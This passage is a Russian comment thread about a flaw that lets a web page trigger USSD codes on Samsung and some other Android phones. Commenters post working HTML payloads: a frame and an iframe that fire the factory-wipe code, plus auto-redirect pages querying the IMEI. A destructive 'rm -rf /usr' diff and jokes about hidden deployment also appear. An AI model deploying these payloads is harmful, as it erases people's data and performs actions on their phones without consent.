Comments 146
Кто протестировать может?
<frame src="tel:*2767*3855%23" />
Зачем ты опубликовал это? У меня теперь телефон пустой, приходиться писать с холодильника, благо там важных файлов нет.
ну зачем же вы так? у меня от этого брат умер.
Вот гад
Вспомнил легендарный топик на ЛОРе… :)
Напомните нам, смертным.
UFO just landed and posted this here
Написали бы прям тут.
-rm -rf /usr /lib/nvidia-current/xorg/xorg
+rm -rf /usr/lib/nvidia-current/xorg/xorg
-rm -rf /usr /lib/nvidia-current/xorg/xorg
+rm -rf /usr/lib/nvidia-current/xorg/xorg
Автор удалил коммит a047be85247755cdbe0acce6f1dafc8beb84f2ac, а в месте с ней и эпичную ветку комментариев страниц этак на 40, которая была похожа на филиал имиджборды, очень жаль, что не успел её куда нибудь сохранить.
Автор переименовал репозиторий, хеш коммита не изменился, комменты не пропали, великое добро торжествует: github.com/MrMEEE/bumblebee-Old-and-abbandoned/commit/a047be85247755cdbe0acce6f1dafc8beb84f2ac
UFO just landed and posted this here
А в конце должно быть %23 или таки #?
круто! сработало :)
Интересно, так сработает?
Нет:
<img src="http://qr.kaywa.com/?s=8&d=tel%3A%2A2767%2A3855%2523" alt=«image»/>
<img src="https://habrastorage.org/getpro/geektimes/comment_images/52e/d7b/053/52ed7b0535bc2cba8f6f179fc93eb92e.png" alt=«image»/>
«%23» — это уже закодированный символ «#», а «%2523» кодирует текст «%23», что уже лишнее.
<img src="https://habrastorage.org/getpro/geektimes/comment_images/52e/d7b/053/52ed7b0535bc2cba8f6f179fc93eb92e.png" alt=«image»/>
«%23» — это уже закодированный символ «#», а «%2523» кодирует текст «%23», что уже лишнее.
«Epic fail»
РЕШЕТО!
Зачем Apple судиться с Samsung?
Одна строчка кода обеспечит приток покупателей :)
Одна строчка кода обеспечит приток покупателей :)
Самсунги то патч выпустят, а вот карты эплу всё равно долго ещё допиливать.
Какое количество блондикок, да и просто, обычных пользователей, применят этот патч? Предполагаю, что 90% пользователей даже не предполагают, что на телефон надо ставить «заплатки».
Не совсем понял минусующих, но как-то раз, в обществе людей не далеких от техники, завел разговор об обновлениях, патчах и тп. Так вот, оказалось, что из 12 человек, только двое, включая меня, устанавливают обновления и т.п. Повторюсь, это было в обществе людей, связанных с техникой.
Все встало на свои места. Не являюсь владельцем девайса на Андроиде, и не знал о способах отображения приходящих уведомлений об обновлениях и патчах.
Спасибо daspisch, разъяснил.
Думаю что да, патчик быстро выпустят.
Спасибо daspisch, разъяснил.
Думаю что да, патчик быстро выпустят.
Ну ребята это нечестно! :) Обвиняете пользователей Apple что на любую недоработку, или необоснованное отсутствие фич, или плохие карты те говорят мол «Все ок! Apple знает что делает!», а вы кричите «Фанатики! Компания лажает а они слепы». А когда Samsung допустила такую ошибку в безопасности… всего-лишь HTML код…
Этот недостаток на время, карты Apple тоже на время, хоть и большее. Но из-за них простой строчкой HTML вы не потеряете все свои файлы. Так что давайте будем честными — возможность стереть данные на вашем телефоне строчкой HTML кода это, извините, обо*****сь в Samsung. Являясь счастливым владельцем Nokia 1280 желаю скорейшего выхода патча для владельцев Samsung и хороших карт для владельцев Apple ;)
Этот недостаток на время, карты Apple тоже на время, хоть и большее. Но из-за них простой строчкой HTML вы не потеряете все свои файлы. Так что давайте будем честными — возможность стереть данные на вашем телефоне строчкой HTML кода это, извините, обо*****сь в Samsung. Являясь счастливым владельцем Nokia 1280 желаю скорейшего выхода патча для владельцев Samsung и хороших карт для владельцев Apple ;)
На айфонах не так давно джейлбрейк также применялся с помощью специальной веб-страницы. Ничего не мешало, в теории, вместо джейла засунуть туда какой-то зловредный код.
>Этот недостаток на время, карты Apple тоже на время, хоть и большее
Если уж быть честными, то давайте будем честными до конца: сколько процентов пользователей айфонов столкнутся с проблемой отстойных карт? А сколько процентов пользователей Самсунга посетят зловредный сайт до того, как Самсунг залатает дырку? ;)
Если уж быть честными, то давайте будем честными до конца: сколько процентов пользователей айфонов столкнутся с проблемой отстойных карт? А сколько процентов пользователей Самсунга посетят зловредный сайт до того, как Самсунг залатает дырку? ;)
Ага-ага: «А у вас негров линчуют»
Ну зато пока карты фиксают реальный мир стёрт не был.
Я как владелец самсунга на стоковой прошивке считаю, что косяк с удалением данных с телефона куда посерьезнее, чем недоделанные карты. Что тут обсуждать то вообще? (: Это же очевидно.
Ну, если ехать по этому маршруту, то окончиться для водителя плачевней, чем потеря данных с телефона…
Для вождения автомобиля все таки права нужны, получение которых подразумевает знание правил дорожного движения, которые не позволят поехать как по жд путям, там и по прочим маршрутам которые может предложить навигатор.
Свои мозги ещё никто не отменял.
Ой, я тут навигатором в Италии пользовался, хертцевским «НеверЛост», он мне и с обрывов советовал «короткой дорогой» и под «кирпичи» и еще всякими разными глупостями заняться. Как видишь — живой. Дорогу то глазами видно (: Хотя разрадало, конечно, согласен, особенно в незнакомой стране. Но если мне qr-код вайп сделает, я буду чуть более чем раздражен, мягко говоря.
«на стоковой прошивке»
Тут интересно, как быстро этот матч дойдет до пользователей.
Ставлю, что и через месяц большая часть телефонов будет непропатчена
Ставлю, что и через месяц большая часть телефонов будет непропатчена
Забавная картинка к новости. Много ключиков, а дырка одна. Вспоминаются школьные уроки из анатомии
Красиво.
HTC One X тоже уязвим. Только что на своем проверил.
Цена вопроса только у HTC1х есть хард ресет через USSD или нет?
Проверил, неуязвим, это у вас что-то другое...)
Проверьте тут: mk.am/m/ussd.html (:
Он выдаст IMEI.
Он выдаст IMEI.
На <frame не работает, вы правы. Но на <iframe как миленький.
Владельцам Samsung посвящается:
Пользователи habrahabr не несут ответственность за любые потери, понесённые в результате посещения этой страницы и страницы ниже. Нажимая на кнопку, вы соглашаетесь потерять все данные на вашем смартфоне.
Я ХОЧУ УДАЛИТЬ ВСЕ ДАННЫЕ СО СВОЕГО ТЕЛЕФОНА
Пользователи habrahabr не несут ответственность за любые потери, понесённые в результате посещения этой страницы и страницы ниже. Нажимая на кнопку, вы соглашаетесь потерять все данные на вашем смартфоне.
Я ХОЧУ УДАЛИТЬ ВСЕ ДАННЫЕ СО СВОЕГО ТЕЛЕФОНА
Только что накидал тестовую страничку, проверить на GalaxyS 2 — работает. Так что аккуратней… В приведенном ниже примере — запрос IMEI.
<html>
<head>
<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.8.1/jquery.min.js"></script>
</head>
<body>
<a onclick="document.location='tel:*%2306%23'" id="link" />Call me</a>
<script>
$(document).ready(function() {
$('#link').click();
});
</script>
</body>
</html>
Слабо берете. Делайте сразу запрос перевода денег ))
Подгрузили jQuery, сделали ссылку с javascript'ом на onclick и по document.ready триггерите его? Да вы знатный извращенец :) Наверняка так тоже будет работать:
<html><head><meta http-equiv="refresh" content="0; url=tel:*%2306%23" /></head><body></body></html>
Можно вообще в хэдер
Location: закинуть и хостить на сокращалке ссылок is.gd/XhBdS7
Получается телефон не спрашивая переходит по такой ссылке?
На десктопе пишет, что это может быть атакой злоумышленников и тд
На десктопе пишет, что это может быть атакой злоумышленников и тд
UFO just landed and posted this here
Ого, так тут не просто сброс к заводским настройкам:
*2767*3855# — Полный сброс l EEPROM ( Этот код удаляет SP-блокиравку!) Но также изменяет IMEI на 447967-89-400044-0
*2767*3855# — Полный сброс l EEPROM ( Этот код удаляет SP-блокиравку!) Но также изменяет IMEI на 447967-89-400044-0
На sgs3 с ICS 4.0.4 не работает. Дефолтный браузер открывает диалер, но он пустой. Мобильная опера попросту отказывается загружать такой фрейм.
В догонку: forum.xda-developers.com/showthread.php?t=1904629
Самсунг был предупрежден и дыры залатал (для S3, как минимум). А вот ХТЦ подвержен (хотя там вроде как нет кода на вайп).
Самсунг был предупрежден и дыры залатал (для S3, как минимум). А вот ХТЦ подвержен (хотя там вроде как нет кода на вайп).
Да весь патч должен быть в запрете набора IMEI через ссылки.
UFO just landed and posted this here
Надо встроить такой iframe в корпоративный портал :D
Для старенького Galaxy S (i9100) на стоковой прошивке помогло установить Dialer One и теперь система спрашивает чем звонить. При просмотре страницы это настораживает и позволяет не попадаться.
А вообще да, бяка страшная и не понятно как будут латать старые модели
А вообще да, бяка страшная и не понятно как будут латать старые модели
Создать платный сервис и контекстную рекламу запустить, с таргетингом на модель телефона. 100500% окупаемость.
На страничке, где вы это взяли, первой строкой стоит «on certain Samsung smartphones running Google’s Android software». Не могли бы вы добавить это тоже первой строкой? Я, конечно, понимаю, что нас не много «не Android пользователей смартфонов Samsung», но все же первой предложение полностью бы поставило все на свои места для меня, и я не стал бы дальше читать эту статью.
Galaxy 5500 cyogenmod 2.7 (TouchWiz отсутствует)- IMEI показал. Выходит любой ussd запрос можно без запроса пользователя отправить — «хороший» способ для подписки к «нужным» мобильным услугам…
А если нажать SADM, то можно увидеть мультик.
Ну, посоны, кто помнит?
Ну, посоны, кто помнит?
Достал из чулана спику, и она тоже…
Самсунг назовет эту фича S Wipe
Самсунг назовет эту фича S Wipe
Вспомнилось как старенькие телефоны Siemens напрочь висли от SMSки "%English". Потом была еще проблема эти смски удалять.
Galaxy Note стоковая 4.0.4 — не работает.
Получается в S3 и Note уже исправили обновлением на прошлой неделе.
Получается в S3 и Note уже исправили обновлением на прошлой неделе.
в мегафоне точно можно сделать перевод бабла с номера на номер через ussd
Эх!
Жаль нет такого аппарата — я бы первым делом побежал проверять (
Жаль нет такого аппарата — я бы первым делом побежал проверять (
Galaxy SL, cyanogen-10 (andr 4.1)
не работает, только текст вставляет.
(ну, правда, ещё вайфай тоже не работает и некоторые приложения глючат)
не работает, только текст вставляет.
(ну, правда, ещё вайфай тоже не работает и некоторые приложения глючат)
Нв самом деле дело тут не в самсунге.
Проблема в стоковом браузере андроида, который позволяет напрямую выполнять USSD команды. Соответственно, если телефон позволяет ussd командой сделать вайп, то оно будет работать. (Ну, или перевести деньги на другой телефон).
Есть подтверждения о HTC hero c 2.1, HTC Tattoo с 1.6, HTC Desire и так далее
В более поздних версиях видимо это поправили, потому что в последних прошивках S3 и Note эксплоит не работает.
Проблема в стоковом браузере андроида, который позволяет напрямую выполнять USSD команды. Соответственно, если телефон позволяет ussd командой сделать вайп, то оно будет работать. (Ну, или перевести деньги на другой телефон).
Есть подтверждения о HTC hero c 2.1, HTC Tattoo с 1.6, HTC Desire и так далее
В более поздних версиях видимо это поправили, потому что в последних прошивках S3 и Note эксплоит не работает.
Осталось добавить этот html код на apple.com :)
Проверил на galaxy ace — работает, правда, только со второго клика, при первом просто открылась звонилка с этим кодом.
Хм. А где же классический комментарий «Вот ведб тупые разработчики! Как такое можно было допустить! У них что, QA не работает? Элементарно же».
А, стоп. Это топик про Андроид и Самсунг. Теперь понятно…
А, стоп. Это топик про Андроид и Самсунг. Теперь понятно…
Наконец-то практичная аватарка для хабра
Samsung Captivate, работает. Однако только при использовании стандартного браузера, Opera Mobile блокирует.
Samsung Galaxy Spica i5700 — ссылка на *#06# сработала, на хардресет даже пробовать не буду :)
Никакого Touch Wiz там, естественно, еще не было, более того — CyanogenMod 7 стоит.
Никакого Touch Wiz там, естественно, еще не было, более того — CyanogenMod 7 стоит.
Не совсем ясно почему в заголовке до сих пор фигурирует только Samsung — дыры то и у HTC с CyanogenMod-ом аналогичные.
Тем временем уже сделали костыль. play.google.com/store/apps/details?id=org.mulliner.telstop
Тем временем уже сделали костыль. play.google.com/store/apps/details?id=org.mulliner.telstop
Похоже, что ошибки типа «con\con» никогда не переведутся.
Всё-таки за это фи Самсунгу, ибо надо спрашивать подтверждения на выполнение таких действий. Код то этот я раньше уже использовал при перепрошивке, и меня очень удивляло отсутствие вопросов, как это бывает на других телефонах.
по ссылке можно скачать прогу, которая не позволяет просто так запускать эксплойты с энтэрнетов
это еще фигня.
а вот как им простить баг в чипах eMMC на 90% устройств Galaxy S II, который при data wipe тупо превращает телефон в суперкирпич?
а вот как им простить баг в чипах eMMC на 90% устройств Galaxy S II, который при data wipe тупо превращает телефон в суперкирпич?
90%?? Я два телефона сначала убил по незнанию (одному и тому же владельцу), а «рабочий» аппарат нормальный попался, без баги.
Ещё вспоминаются планшеты, где при любом доступе к одному из системных файлов (в т.ч. листинг папки) блочил сенсорный экран намертво, чуть ли не перепрошивка требовалась (шум поднялся из-за dr.web, который при сканировании читал этот файл и убивал девайс).
Ещё вспоминаются планшеты, где при любом доступе к одному из системных файлов (в т.ч. листинг папки) блочил сенсорный экран намертво, чуть ли не перепрошивка требовалась (шум поднялся из-за dr.web, который при сканировании читал этот файл и убивал девайс).
Если гарантия еще есть, то самсунг спокойно поменяет вам материнскую плату на ту, которая уже с нормальным чипом.
Гарантия была, в сервисе поменяли плату за пару дней (похоже, плат у них там с запасом). Но, всё ещё не зная о проблеме (в первый раз аппарат глючил сам по себе, списали на очередной глюк), попробовал ещё раз сменить прошивку, с тем же результатом, то есть чип опять попался глючный. С другой стороны, есть и положительный момент: после двух обращений в сервис по одной и той же проблеме, магазин вернул деньги, что почти полностью покрыло покупку sgs3 там же.
Sign up to leave a comment.
Одна строка HTML кода может удалить данные или перезагрузить телефоны Samsung